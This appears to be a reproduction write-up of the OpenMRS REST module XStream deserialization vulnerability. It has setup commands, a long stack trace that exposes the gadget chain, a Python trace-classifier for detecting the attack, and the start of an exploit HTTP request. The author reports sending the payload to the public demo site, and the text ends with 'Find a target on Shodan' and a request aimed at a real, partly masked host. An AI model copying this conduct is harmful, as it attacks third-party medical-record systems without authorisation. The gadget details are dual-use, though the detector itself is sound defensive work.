It feels a bit like the payload for S2-052 (CVE-2017-9805), but I couldn't find where it triggers.
References:
https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/
https://www.exploit-db.com/exploits/46327
https://talk.openmrs.org/t/question-about-web-services-cve-on-older-versions-of-openmrs/21677/3
Sending the payload to the official demo site (demo.openmrs.org) showed it no longer triggers.
Reference: https://wiki.openmrs.org/display/docs/Developer+How-To+Setup+And+Use+IntelliJ
The tutorial says you need to install the REST API module and then pull in some dependencies with Maven.
git clone https://github.com/openmrs/openmrs-module-webservices.rest
cd openmrs-module-webservices.rest
Then, per the vulnerability description, the bug was fixed in 2.24.0, so find the commit for 2.23.0 and check it out.
git checkout f44f68ee -b f44f68ee
mvn clean install -DskipTests   # skip the tests to save time
Using the downloaded war on Windows, I reproduced it successfully.
First I tried setting up the environment myself:
wget https://jaist.dl.sourceforge.net/project/openmrs/releases/OpenMRS_Platform_2.1.3/openmrs.war
Then drop the war into Tomcat's webapps directory; it is extracted automatically.
After setup, access /openmrs/ws/rest/v1/patient directly:
ERROR - BaseRestController.handleException(115) |2019-02-12 21:58:35,576| Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service : java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConverter
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
org.springframework.http.converter.HttpMessageNotReadableException: Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service : java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConverter
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
    at org.springframework.http.converter.xml.MarshallingHttpMessageConverter.readFromSource(MarshallingHttpMessageConverter.java:134)
    at org.springframework.http.converter.xml.AbstractXmlHttpMessageConverter.readInternal(AbstractXmlHttpMessageConverter.java:61)
    at org.springframework.http.converter.AbstractHttpMessageConverter.read(AbstractHttpMessageConverter.java:159)
    at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.readWithMessageConverters(HandlerMethodInvoker.java:646)
    at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.resolveRequestBody(HandlerMethodInvoker.java:609)
    at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.resolveHandlerArguments(HandlerMethodInvoker.java:358)
    at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:172)
    at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:446)
    at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:434)
    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:943)
    at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:877)
    at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:966)
    at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:868)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
    at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:842)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilterChain.java:72)
    at org.openmrs.web.filter.GZIPFilter.doFilterInternal(GZIPFilter.java:64)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilterChain.java:70)
    at org.openmrs.module.webservices.rest.web.filter.AuthorizationFilter.doFilter(AuthorizationFilter.java:104)
    at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilterChain.java:70)
    at org.springframework.web.filter.ShallowEtagHeaderFilter.doFilterInternal(ShallowEtagHeaderFilter.java:82)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilterChain.java:70)
    at org.openmrs.module.owa.filter.OwaFilter.doFilter(OwaFilter.java:64)
    at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilterChain.java:70)
    at org.openmrs.module.web.filter.ModuleFilter.doFilter(ModuleFilter.java:54)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.openmrs.web.filter.OpenmrsFilter.doFilterInternal(OpenmrsFilter.java:108)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.springframework.orm.hibernate4.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:150)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
    at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:218)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:506)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1115)
    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)
Caused by: org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service : java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConverter
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
    at org.springframework.oxm.xstream.XStreamMarshaller.convertXStreamException(XStreamMarshaller.java:839)
    at org.springframework.oxm.xstream.XStreamMarshaller.doUnmarshal(XStreamMarshaller.java:817)
    at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalReader(XStreamMarshaller.java:805)
    at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalInputStream(XStreamMarshaller.java:795)
    at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalInputStream(XStreamMarshaller.java:787)
    at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalStreamSource(XStreamMarshaller.java:736)
    at org.springframework.oxm.support.AbstractMarshaller.unmarshal(AbstractMarshaller.java:324)
    at org.springframework.http.converter.xml.MarshallingHttpMessageConverter.readFromSource(MarshallingHttpMessageConverter.java:127)
    ... 70 more
Caused by: com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service : java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConverter
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
    at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:79)
    at com.thoughtworks.xstream.core.AbstractReferenceUnmarshaller.convert(AbstractReferenceUnmarshaller.java:65)
    at com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnmarshaller.java:66)
    at com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnmarshaller.java:50)
    at com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller.java:134)
    at com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarshal(AbstractTreeMarshallingStrategy.java:32)
    at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1058)
    at org.springframework.oxm.xstream.XStreamMarshaller.doUnmarshal(XStreamMarshaller.java:814)
    ... 76 more
Caused by: java.lang.ClassCastException: java.lang.String cannot be cast to java.security.Provider$Service
    at javax.crypto.Cipher.chooseFirstProvider(Cipher.java:745)
    at javax.crypto.Cipher.update(Cipher.java:1827)
    at javax.crypto.CipherInputStream.getMoreData(CipherInputStream.java:132)
    at javax.crypto.CipherInputStream.read(CipherInputStream.java:239)
    at com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx.readFrom(ByteArrayOutputStreamEx.java:65)
    at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.get(Base64Data.java:182)
    at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString(Base64Data.java:286)
    at jdk.nashorn.internal.objects.NativeString.getStringValue(NativeString.java:121)
    at jdk.nashorn.internal.objects.NativeString.hashCode(NativeString.java:117)
    at java.util.HashMap.hash(HashMap.java:339)
    at java.util.HashMap.put(HashMap.java:612)
    at com.thoughtworks.xstream.converters.collections.MapConverter.putCurrentEntryIntoMap(MapConverter.java:93)
    at com.thoughtworks.xstream.converters.collections.MapConverter.populateMap(MapConverter.java:78)
    at com.thoughtworks.xstream.converters.collections.MapConverter.populateMap(MapConverter.java:72)
    at com.thoughtworks.xstream.converters.collections.MapConverter.unmarshal(MapConverter.java:67)
    at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:72)
    ... 83 more
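The innermost "Caused by" block above is the part worth reading: XStream's MapConverter inserts the entry into a HashMap, HashMap calls hashCode() on the key, which is a jdk.nashorn NativeString whose value is a JAXB Base64Data, and that Base64Data's toString() reads through a javax.crypto.CipherInputStream into Cipher.chooseFirstProvider(), where the ClassCastException is thrown. The exception message alone ("java.lang.String cannot be cast to java.security.Provider$Service") looks like an ordinary type error; the frame sequence is what identifies it. The detector below is an added example for this write-up, not code from OpenMRS, XStream or Spring; it encodes that frame sequence and classifies a stack trace copied from the Tomcat or OpenMRS log. Both sample traces are constructed: one condensed from the trace above, the other a harmless XStream conversion error with illustrative file and line numbers.

```python
"""Classify a Java stack trace as an XStream gadget-chain attempt.

Added example for this write-up, not code from OpenMRS, XStream or Spring.
It encodes the frame sequence of the innermost "Caused by" block above:
MapConverter -> HashMap.put -> NativeString.hashCode -> Base64Data.toString
-> CipherInputStream.read -> Cipher, where the ClassCastException is raised.
A harmless XStream conversion error never reaches the nashorn/JAXB/crypto
frames, so it is classified separately.
"""
import re

# "    at pkg.Class.method(File.java:123)" -> group(1) is "pkg.Class.method"
FRAME_RE = re.compile(r"^\s*at\s+([\w$.<>]+)\(")

# Frame prefixes in the order a trace prints them: the sink first, the
# XStream caller last. All five must appear, in this order, in one block.
GADGET_CHAIN = (
    "javax.crypto.CipherInputStream.read",
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString",
    "jdk.nashorn.internal.objects.NativeString.hashCode",
    "java.util.HashMap.put",
    "com.thoughtworks.xstream.converters.collections.MapConverter.putCurrentEntryIntoMap",
)
XSTREAM_PREFIX = "com.thoughtworks.xstream."


def split_causes(trace):
    """One list of 'pkg.Class.method' frames per exception in the chain.

    blocks[0] is the outermost exception, blocks[-1] the innermost "Caused by".
    """
    blocks, current = [], []
    for line in trace.splitlines():
        if line.startswith("Caused by:"):
            blocks.append(current)
            current = []
            continue
        m = FRAME_RE.match(line)
        if m:
            current.append(m.group(1))
    blocks.append(current)
    return blocks


def has_ordered_frames(frames, markers):
    """True if each marker prefixes some frame and the matches are in order."""
    pos = 0
    for marker in markers:
        while pos < len(frames) and not frames[pos].startswith(marker):
            pos += 1
        if pos == len(frames):
            return False
        pos += 1
    return True


def classify(trace):
    """Return 'xstream-gadget-chain', 'xstream-conversion-error' or 'other'."""
    blocks = split_causes(trace)
    if has_ordered_frames(blocks[-1], GADGET_CHAIN):
        return "xstream-gadget-chain"
    if any(f.startswith(XSTREAM_PREFIX) for block in blocks for f in block):
        return "xstream-conversion-error"
    return "other"


# Constructed sample, condensed from the innermost blocks of the trace above
# (outer Spring/Tomcat frames and a few pass-through frames dropped).
GADGET_TRACE = """\
Caused by: com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service
    at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:79)
    ... 76 more
Caused by: java.lang.ClassCastException: java.lang.String cannot be cast to java.security.Provider$Service
    at javax.crypto.Cipher.chooseFirstProvider(Cipher.java:745)
    at javax.crypto.CipherInputStream.getMoreData(CipherInputStream.java:132)
    at javax.crypto.CipherInputStream.read(CipherInputStream.java:239)
    at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString(Base64Data.java:286)
    at jdk.nashorn.internal.objects.NativeString.hashCode(NativeString.java:117)
    at java.util.HashMap.hash(HashMap.java:339)
    at java.util.HashMap.put(HashMap.java:612)
    at com.thoughtworks.xstream.converters.collections.MapConverter.putCurrentEntryIntoMap(MapConverter.java:93)
    at com.thoughtworks.xstream.converters.collections.MapConverter.unmarshal(MapConverter.java:67)
    ... 83 more
"""

# Constructed sample of a harmless XStream failure (non-numeric text fed to
# an int field); the file/line numbers are illustrative, not from any log.
BENIGN_TRACE = """\
org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception
    at org.springframework.oxm.xstream.XStreamMarshaller.convertXStreamException(XStreamMarshaller.java:839)
Caused by: com.thoughtworks.xstream.converters.ConversionException: For input string: "abc"
    at com.thoughtworks.xstream.converters.basic.AbstractSingleValueConverter.unmarshal(AbstractSingleValueConverter.java:37)
    at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshaller.java:72)
    ... 70 more
"""

if __name__ == "__main__":
    for name, trace in (("gadget", GADGET_TRACE), ("benign", BENIGN_TRACE)):
        print(name, "->", classify(trace))
```

The detector reads frame lines only, so a trace wrapped at 80 columns the way the console output above was must be rejoined first; catalina.out and openmrs.log write each frame on one line. It matches on the call sequence rather than on the exception text, because the message by itself does not distinguish this from an ordinary XStream type error, and it inspects only the innermost cause, since that is where the gadget classes appear.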
Find a target on Shodan.
Payload:
POST /openmrs/ws/rest/v1/patient HTTP/1.1
Host: 54.218.x.y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Connection: close
Content-Type: text/xml
Content-Length: 2392